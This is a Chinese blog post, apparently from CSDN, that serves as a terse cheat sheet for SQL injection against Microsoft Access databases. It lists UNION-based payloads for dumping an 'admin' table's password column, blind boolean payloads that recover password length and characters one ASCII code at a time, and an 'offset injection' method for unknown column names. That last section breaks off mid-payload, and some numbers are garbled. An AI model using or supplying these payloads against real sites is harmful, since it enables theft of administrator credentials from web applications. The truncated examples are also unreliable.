access数据库偏移注入

本文详细介绍了Access数据库的注入攻击,包括A类联合注入和B类逐字注入的方法,如通过ORDER BY确定字段数、UNION SELECT爆数字和猜列名等。在获取列名失败的情况下,文章探讨了利用偏移注入和社会工程学技巧进行列名猜测,并给出了多个示例查询,展示了如何逐步揭示数据库信息。
摘要由CSDN通过智能技术生成

一、access注入

access只有一个数据库
A联合注入
1、order by 20 确定字段数 猜表名
2、union select 1,2,3,4,5,6 from admin 爆数字
3、union select password,2,3,4,5,6 from admin 猜列名
B逐字注入
1、 and exist(select * from admin) 猜表
有admin表返回正常

2、 and exist(select password from admin) 猜列
有password列返回正常

3、 and (select top 1 len(password) from admin)=5 确定长度
and (select top 1 len(password) from admin)>5
等于5或大于5返回正常

4、 and (select top 1 asc(mid(password,2,1)) from admin)=97
确定具体数 97是ASCII码
对则返回正常

二、access获取列名失败

采用偏移注入、社工、查看源码中参数名

1、union select 1,2,3,4,5,6,7,8,9,1,0,11,12,13,14,15,16,17,18,19,2 0,21,22 from admin

2、union select 1,2,3,4,5,6,7,8,9,1,0,11,12,13,14,15,16,17,18,19,20,21 * from admin

3、union select 1,2,3,4,5,6,7,8,9,1,0,11,12,13,14,15,16,17,18,19,20 * from admin
减到多少返回正常时,则执行 倍数 减 假设为4

union select 1

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值